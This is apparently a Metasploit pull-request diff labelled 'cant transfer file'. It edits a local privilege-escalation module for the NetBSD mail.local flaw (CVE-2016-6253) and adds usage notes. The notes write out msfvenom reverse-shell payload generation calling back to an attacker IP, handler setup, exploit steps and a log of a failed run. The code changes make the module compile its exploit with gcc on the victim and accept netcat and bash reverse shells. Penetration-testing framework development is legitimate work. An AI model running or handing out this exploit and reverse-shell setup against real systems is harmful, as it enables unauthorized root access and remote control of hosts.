cant transfer file

documentation/modules/exploit/unix/local/netbsd_mail_local.md

@@ -0,0 +1,39 @@
+# Create payload for initial shell and transfer it
+```
+./msfvenom -p cmd/unix/reverse lhost=172.16.152.1 > /tmp/bsd.payload
+scp /tmp/bsd.payload user@172.16.152.128:/tmp/
+```
+# Start the handler to receive
+```
+use exploit/multi/handler
+set payload cmd/unix/reverse
+set lhost 172.16.152.1
+exploit
+```
+# Exploit
+```
+use exploit/unix/local/netbsd_mail_local
+set payload cmd/unix/reverse
+set lhost 172.16.152.1
+set session 1
+set verbose true
+exploit
+```
+
+# Issue
+There doesn't seem to be a reliable method to get the ascii (or originally its binary) to the target system...
+```
+[*] Started reverse TCP double handler on 172.16.152.1:4444 
+[*] Writing Payload to /tmp/zrWqhXpL
+[*] Max line length is 131073
+[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
+[-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
+[*] Exploit completed, but no session was created.
+```

modules/exploits/unix/local/netbsd_mail_local.rb

@@ -28,32 +28,31 @@ class MetasploitModule < Msf::Exploit::Local
             "h00die <mike@stcyrsecurity.com>",  # Module
             "akat1"                             # Discovery
           ],
-        "Platform"       => [ "unix", "bsd", "linux" ],
+
         "DisclosureDate" => "July 07 2016",
-        "Targets"       =>
-          [
-            [ 'NetBSD x86',       { 'Arch' => ARCH_X86 } ],
-            [ 'NetBSD x64',       { 'Arch' => ARCH_X86_64 } ]
-          ],
-        "DefaultTarget" => 1,
-        'DefaultOptions' => { 'WfsDelay' => 601 }, #can take 10min for cron to kick
-        'Payload'        =>
-        {
-          'Compat'     =>
-          {
-            'PayloadType'  => 'cmd',
-            'RequiredCmd'  => 'generic',
-            'BadChars' => "\x00"
+        'Platform'        => 'unix',
+        'Arch'            => ARCH_CMD,
+        'SessionTypes'    => %w{shell meterpreter},
+        'Privileged'      => true,
+        'Payload'         => {
+          'Compat'        => {
+            'PayloadType' => 'cmd cmd_bash',
+            'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
           }
         },
+        "Targets"       =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        "DefaultTarget" => 0,
+        'DefaultOptions' => { 'WfsDelay' => 601 }, #can take 10min for cron to kick
         "References"     =>
           [
             [ "URL", "http://akat1.pl/?id=2"],
             [ "EDB", "40141"],
             [ "CVE", "2016-6253"],
             [ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
-          ],
-        "SessionTypes"   => ["shell"]
+          ]
       ))
     register_options([
       OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
@@ -292,25 +291,29 @@ class MetasploitModule < Msf::Exploit::Local
     main.gsub!(/execl("\/tmp\/ksh", "ksh", NULL);/,
                "execl(\"#{payload_path}\", \"ksh\", NULL);")
 
-    cpu = nil
-    if target['Arch'] == ARCH_X86
-      cpu = Metasm::Ia32.new
-    elsif target['Arch'] == ARCH_X86_64
-      cpu = Metasm::X86_64.new
-    end
+    #cpu = nil
+    #if target['Arch'] == ARCH_X86
+    #  cpu = Metasm::Ia32.new
+    #elsif target['Arch'] == ARCH_X86_64
+    #  cpu = Metasm::X86_64.new
+    #end
 
-    begin
-      elf = Metasm::ELF.compile_c(cpu, main).encode_string
-    rescue
-      print_error "Metasm Encoding failed: #{$ERROR_INFO}"
-      elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
-      elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
-      return
-    end
+    #begin
+    #  elf = Metasm::ELF.compile_c(cpu, main).encode_string
+    #rescue
+    #  print_error "Metasm Encoding failed: #{$ERROR_INFO}"
+    #  elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+    #  elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
+    #  return
+    #end
 
-    print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)"
+    print_status "Writing exploit executable to #{executable_path}"
     rm_f executable_path
-    write_file(executable_path, elf)
+    write_file(executable_path, main)
+    print_status('Compiling via gcc')
+    output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}")
+    output.each_line { |line| vprint_status(line.chomp) }
+    
     print_status("Executing.  May take up to 10min for callback")
     output = cmd_exec("chmod +x #{executable_path}; #{executable_path}")
     output.each_line { |line| vprint_status(line.chomp) }
@@ -321,5 +324,6 @@ class MetasploitModule < Msf::Exploit::Local
       Rex.sleep(1)
     end
     register_file_for_cleanup(executable_path)
+    register_file_for_cleanup("#{executable_path}.out")
   end
 end